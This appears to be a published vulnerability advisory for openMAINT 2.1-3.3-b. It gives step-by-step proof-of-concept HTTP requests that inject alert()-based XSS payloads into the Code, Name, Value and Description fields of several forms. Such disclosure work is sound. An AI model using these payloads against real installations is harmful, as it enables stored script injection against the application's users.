# Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting # Date: 13/03/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.openmaint.org/ # Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/ # Version: 2.1-3.3 # Tested on: Linux Summary: Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters. Proof of concepts : 1-Login to you'r Dashboard As a low privilege user 2-Click On Facilities and assets - Location - Sites 3- +Add card Building 4- Code and name parameters both are vulnerable POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json ..... Cookie: ... {"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....} The Xss will trigger in that form, and also if you click on "Map" button , the xss will trigger there ------------------------------------------------------------------------ Another Xss : 1-Like above in Facilities click on Locations and click on complex 2-click + Add card Complex 3-insert javascript payload to Code And Name POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json .... Connection: close Referer: Cookie: .... {"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...} 4-Save it 5-Back to Sites and click on previous card 6- in position section click on "Complex" drop down 7- xss will trigger ------------------------------------------------------------------------ Another Xss: 1-Like exmaples above go to Locations and click on Sites 2-Add Card Building or click the one you created before 3-in left menu click on "Relations" 4-click "Add relations" and select one of the options 5- Add Card and select one of the options 6- insert javascript payload to code and name parameter POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... } 7- save it and close the form 8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list 9- xss payload will trigger ------------------------------------------------------ Another Xss: 1- In "Navigation" Bar click on "Configurations" 2- Click on parameter 3- + Add card Parameter 4- Insert javascript payload to Code and Value PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....} save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger ------------------------------------------------------- Another Xss: 1-Click Facilities and assets 2-Locations 3-Select one of cards 4-Click "Add Card" 5-in "Attachments" tab click "Add attachment" select "Document" or "image" 6-insert javascript payload in "Code" and "Description" PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate CMDBuild-ActionId: class.card.attachments.open CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8 Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543 Content-Length: 1020 Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 -----------------------------1049383330380851725139941543 Content-Disposition: form-data; name="attachment"; filename="blob" Content-Type: application/json {"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...} -----------------------------1049383330380851725139941543-- 7-save it and xss will trigger